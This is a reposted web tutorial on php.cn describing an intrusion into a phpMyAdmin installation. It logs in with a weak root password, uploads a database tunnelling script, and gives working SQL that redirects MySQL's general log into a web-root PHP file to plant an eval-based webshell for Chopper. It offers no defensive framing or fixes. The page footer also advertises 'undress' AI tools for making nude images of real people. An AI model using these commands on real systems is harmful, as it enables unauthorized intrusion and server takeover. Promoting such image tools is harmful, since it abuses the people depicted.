Share a penetration test by Phpmyadmin-phpMyAdmin-php.cn

Home

Database

phpMyAdmin

Share a penetration test by Phpmyadmin

藏色散人

Mar 12, 2021 am 11:55 AM

phpmyadmin

The following is a penetration test of Phpmyadmin from the tutorial column of phpmyadmin. I hope it will be helpful to friends in need!

First scan a certain site through directory scanning and find that phpmyadmin exists. Try the weak password root: root is lucky to get in

##Try to use When Navicate connects to the database, it returns that remote connection to the database is prohibited:

However, the remote command execution found that the local 3306 port was open, so it tried to connect through a proxy:

Upload the ntunnel_mysql.php file (database proxy script) in the Navicat installation directory to any web site directory on the target server (uploaded later after getshell)

Upload to the D:/phpStudy/WWW directory to access http://XXX/ntunnel_mysql.php Test successful

Test connection:

(At this time, open Navicat locally to configure the http connection. The channel address here is the url you visited above. To put it bluntly, On the agent side, check the box to use base64 encoding to prevent waf from causing trouble. Then write localhost as the host name, and write the account of the lnmp01 local database user as the account password, because you need to connect to the local mysql of lnmp01)

Phpmyadmin Get Shell:

Use log files

mysql version 5.0 or above will create log files and modify the global log file Variables can also be used with getshell. But you must also have read and write permissions on the generated logs.

set global general_log = "ON";   #当开启general时，所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件那么，如果修改general_log_file的值，那么所执行的sql语句就会对应生成进而getshell
SET global general_log_file=&#39;D:/phpStudy/WWW/test1234.php&#39;;  #对应就会生成test1234.php文件
select &#39;<?php eval($_POST[2019]);?>&#39;;          #将一句话木马写入test1234.php文件

Chopper connection:

The above is the detailed content of Share a penetration test by Phpmyadmin. For more information, please follow other related articles on the PHP Chinese website!

Statement

This article is reproduced at:cnblogs. If there is any infringement, please contact admin@php.cn delete

phpMyAdmin: Accessing and Managing MySQL DatabasesMay 05, 2025 am 12:08 AM

phpMyAdmin provides an intuitive interface through the browser to help manage MySQL databases. 1. Create a database and table: Enter the code in the "SQL" tab and execute it. 2. Optimize table: Use the "OPTIMIZETABLE" command to improve query performance. 3. Permission management: Use the "SHOWGRANTS" and "GRANT" commands to check and modify permissions. 4. Performance optimization: regularly optimize tables, use indexes, and avoid large-scale imports.

MySQL: The Engine, phpMyAdmin: The User InterfaceMay 04, 2025 am 12:02 AM

MySQL and phpMyAdmin are powerful database tools, and their combination provides convenience for database management. MySQL's high performance, scalability and security make it the first choice for database engines, while phpMyAdmin's database management, data import and export, and user management capabilities simplify database operations. The actual case shows how they work together, and provides optimization strategies such as index optimization, query optimization, caching mechanism and phpMyAdmin configuration tuning to improve performance.

The Role of SQL in phpMyAdmin: A Deep DiveMay 03, 2025 am 12:07 AM

SQL's role in phpMyAdmin is multifaceted, including data operation, database design, optimization and maintenance. 1.SQL is used for basic data operations, such as querying and inserting data. 2.SQL supports complex queries, view creation and stored procedure writing. 3. In phpMyAdmin, SQL commands are executed through the MySQL server, and the results are displayed in a table form. 4. Users can perform performance optimization through SQL, such as indexing and query optimization.

Beyond the Interface: phpMyAdmin and the Power of SQLMay 02, 2025 am 12:21 AM

The combination of phpMyAdmin and SQL allows users to directly enter and execute SQL commands, implementing more complex queries and database management. 1) In phpMyAdmin, you can execute SQL commands, such as SELECTFROMusersWHEREage>30; 2) Use the EXPLAIN command to analyze the execution plan of the query and optimize performance; 3) By creating indexes, avoiding SELECT and using LIMIT, the query efficiency can be significantly improved.

phpMyAdmin: Managing SQL Databases with EaseMay 01, 2025 am 12:24 AM

phpMyAdmin is a tool for managing MySQL and MariaDB databases through a web interface. 1) Create a database: Use the CREATEDATABASE command. 2) Create table and insert data: Use the CREATETABLE and INSERTINTO commands. 3) Create a view: Use the CREATEVIEW command to simplify querying. 4) Optimize table: Use the OPTIMIZETABLE command to improve query speed.

Is phpMyAdmin a Database? Clarifying Its RoleApr 30, 2025 am 12:13 AM

phpMyAdminisnotadatabase;it'saweb-basedtoolformanagingMySQLandMariaDBdatabases.Itoffersfeatureslikecreating/modifyingdatabases,executingSQLqueries,managingusers/permissions,andimporting/exportingdata.

MySQL: The Database, phpMyAdmin: The Management InterfaceApr 29, 2025 am 12:44 AM

MySQL and phpMyAdmin can be effectively managed through the following steps: 1. Create and delete database: Just click in phpMyAdmin to complete. 2. Manage tables: You can create tables, modify structures, and add indexes. 3. Data operation: Supports inserting, updating, deleting data and executing SQL queries. 4. Import and export data: Supports SQL, CSV, XML and other formats. 5. Optimization and monitoring: Use the OPTIMIZETABLE command to optimize tables and use query analyzers and monitoring tools to solve performance problems.

phpMyAdmin: An Introduction to the Database Management ToolApr 28, 2025 am 12:27 AM

phpMyAdmin simplifies MySQL database management through the web interface. 1) Create, modify, and delete databases and tables; 2) Execute SQL queries; 3) Import and export data; 4) Manage user permissions. It interacts with MySQL through a web server, providing an intuitive operation interface.

See all articles

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

How to fix KB5055523 fails to install in Windows 11?

3 weeks agoByDDD

How to fix KB5055518 fails to install in Windows 10?

3 weeks agoByDDD

Roblox: Dead Rails - How To Tame Wolves

4 weeks agoByDDD

Strength Levels for Every Enemy & Monster in R.E.P.O.

3 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Roblox: Grow A Garden - Complete Mutation Guide

2 weeks agoByDDD

Hot Tools

Atom editor mac version download

The most popular open source editor

SublimeText3 Mac version

God-level code editing software (SublimeText3)

PhpStorm Mac version

The latest (2018.2.1) professional PHP integrated development tool

MantisBT

Mantis is an easy-to-deploy web-based defect tracking tool designed to aid in product defect tracking. It requires PHP, MySQL and a web server. Check out our demo and hosting services.

mPDF

mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),

Hot Topics

1655

1414

1307

1254

1228